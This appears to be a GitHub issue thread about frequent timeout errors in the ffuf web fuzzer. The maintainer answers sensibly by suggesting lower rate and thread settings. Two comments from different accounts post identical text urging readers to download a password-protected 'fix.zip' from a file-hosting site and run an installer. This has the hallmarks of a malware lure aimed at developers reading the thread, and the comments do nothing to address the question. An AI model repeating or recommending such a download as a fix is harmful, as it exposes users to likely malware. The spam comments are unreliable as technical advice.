### ISSUE TITLE
Too much Client.Timeout error

### ISSUE THREAD

**Issue by Hu3sky** [ffuf/ffuf#810]
```go
        opts.HTTP.Timeout = 120
	opts.HTTP.ProxyURL = config.GetConfiguration().Proxy
	opts.HTTP.Headers = append(opts.HTTP.Headers,
		"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36",
	)
	opts.General.Threads = 40
```

but still too much timeout, how to fix it.

![image](https://github.com/user-attachments/assets/5156223e-bb7a-47c2-8a7f-458af678145d)

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by bsysop** [comment]
Hi @Hu3sky, likely the web server is dying, even with longer timeouts it will still dies, so try with lower number of requests per second (-rate and -threads arguments)

Closing this by now, please re-open if you have additional questions.

Happy hacking.
